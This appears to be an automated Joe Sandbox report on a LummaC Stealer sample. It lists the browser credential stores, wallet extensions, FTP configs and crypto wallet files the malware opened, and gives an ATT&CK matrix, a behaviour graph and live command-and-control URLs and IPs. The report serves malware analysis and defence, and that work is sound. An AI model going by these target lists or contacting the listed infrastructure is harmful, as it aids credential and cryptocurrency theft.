      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
      Tries to harvest and steal ftp login credentials
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Tries to steal Crypto Currency Wallets
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\LHEPQPGEWFJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\TQDFJHPUIUJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.comDirectory queried: C:\Users\user\Documents\DUUDTUBZFWJump to behavior

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
      Windows Management Instrumentation      		1
      DLL Side-Loading      		12
      Process Injection      		111
      Masquerading      		2
      OS Credential Dumping      		21
      Security Software Discovery      		Remote Services11
      Input Capture      		1
      Web Service      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Native API      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		221
      Virtualization/Sandbox Evasion      		11
      Input Capture      		3
      Process Discovery      		Remote Desktop Protocol1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)12
      Process Injection      		Security Account Manager221
      Virtualization/Sandbox Evasion      		SMB/Windows Admin Shares31
      Data from Local System      		1
      Ingress Tool Transfer      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS1
      Application Window Discovery      		Distributed Component Object Model1
      Clipboard Data      		3
      Non-Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets13
      File and Directory Discovery      		SSHKeylogging14
      Application Layer Protocol      		Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain Credentials25
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1581739 Sample: !Set-up..exe Startdate: 28/12/2024 Architecture: WINDOWS Score: 100 39 rentry.co 2->39 41 xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi 2->41 43 fallyjustif.click 2->43 53 Suricata IDS alerts for network traffic 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected LummaC Stealer 2->57 61 4 other signatures 2->61 10 !Set-up..exe 24 2->10         started        signatures3 59 Connects to a pastebin service (likely for C&C) 39->59 process4 process5 12 cmd.exe 2 10->12         started        file6 33 C:\Users\user\AppData\Local\...\Banned.com, PE32 12->33 dropped 63 Drops PE files with a suspicious file extension 12->63 16 Banned.com 1 12->16         started        21 cmd.exe 2 12->21         started        23 cmd.exe 1 12->23         started        25 9 other processes 12->25 signatures7 process8 dnsIp9 35 fallyjustif.click 172.67.213.115, 443, 49784, 49790 CLOUDFLARENETUS United States 16->35 37 rentry.co 172.67.75.40, 443, 49836 CLOUDFLARENETUS United States 16->37 31 C:\Users\...\Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1, HTML 16->31 dropped 45 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->45 47 Query firmware table information (likely to detect VMs) 16->47 49 Tries to harvest and steal ftp login credentials 16->49 51 2 other signatures 16->51 27 powershell.exe 7 16->27         started        file10 signatures11 process12 process13 29 conhost.exe 27->29         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      !Set-up..exe15%VirustotalBrowse
      !Set-up..exe16%ReversingLabs

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\71992\Banned.com0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      https://fallyjustif.click/api0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      fallyjustif.click
      		172.67.213.115
      		truetrue
        		unknown
        rentry.co
        		172.67.75.40
        		truefalse
          		high
          xhWaXURTqNAudpSlyMZZXaDi.xhWaXURTqNAudpSlyMZZXaDi
          		unknown
          		unknowntrue
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://rentry.co/feouewe5/rawfalse
              		high
              https://fallyjustif.click/apitrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://rentry.co/whathZ#l(M/powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://rentry.co/whathZ#lpowershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://aka.ms/pscore6lBpowershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://rentry.co/static/icons/512.pnghZ#lpowershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://rentry.co/powershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.drfalse
                        		high
                        https://rentry.co/static/icons/512.pngZ0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.drfalse
                          		high
                          https://rentry.co/whatpowershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2787345765.00000000050B9000.00000004.00000800.00020000.00000000.sdmp, Z0C5PJM9UIPTPTUO9KXONZLNPXS.ps1.13.drfalse
                            		high
                            http://www.autoitscript.com/autoit3/XBanned.com, 0000000D.00000000.2078706005.0000000000785000.00000002.00000001.01000000.00000007.sdmp, Banned.com.2.dr, Ford.9.drfalse
                              		high
                              http://nsis.sf.net/NSIS_ErrorError!Set-up..exefalse
                                		high
                                https://www.autoitscript.com/autoit3/Writing.9.dr, Banned.com.2.drfalse
                                  		high
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2787345765.0000000004F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.teamviewer.com!Set-up..exefalse
                                      		high
                                      https://rentry.co/hZ#lpowershell.exe, 00000011.00000002.2787345765.000000000529C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        172.67.213.115
                                        		fallyjustif.clickUnited States
                                        		13335CLOUDFLARENETUStrue
                                        172.67.75.40
                                        		rentry.coUnited States
                                        		13335CLOUDFLARENETUSfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1581739
                                        Start date and time:2024-12-28 21:34:11 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 5m 41s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:19
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:!Set-up..exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@29/28@3/2
                                        EGA Information:
                                        • Successful, ratio: 50%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 35
                                        • Number of non-executed functions: 40
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                        • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.63, 172.202.163.200
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target powershell.exe, PID 6516 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        15:35:01API Interceptor1x Sleep call for process: !Set-up..exe modified
                                        15:35:42API Interceptor23x Sleep call for process: Banned.com modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        172.67.213.115Outfordelivery389402.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        HRScheduleH3965005.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        PI-9823472110866.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        uhr908723097306.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
                                        Vac.list07-2021-6014910.xlsmGet hashmaliciousIcedIDBrowse
                                        • astrocycle.download/
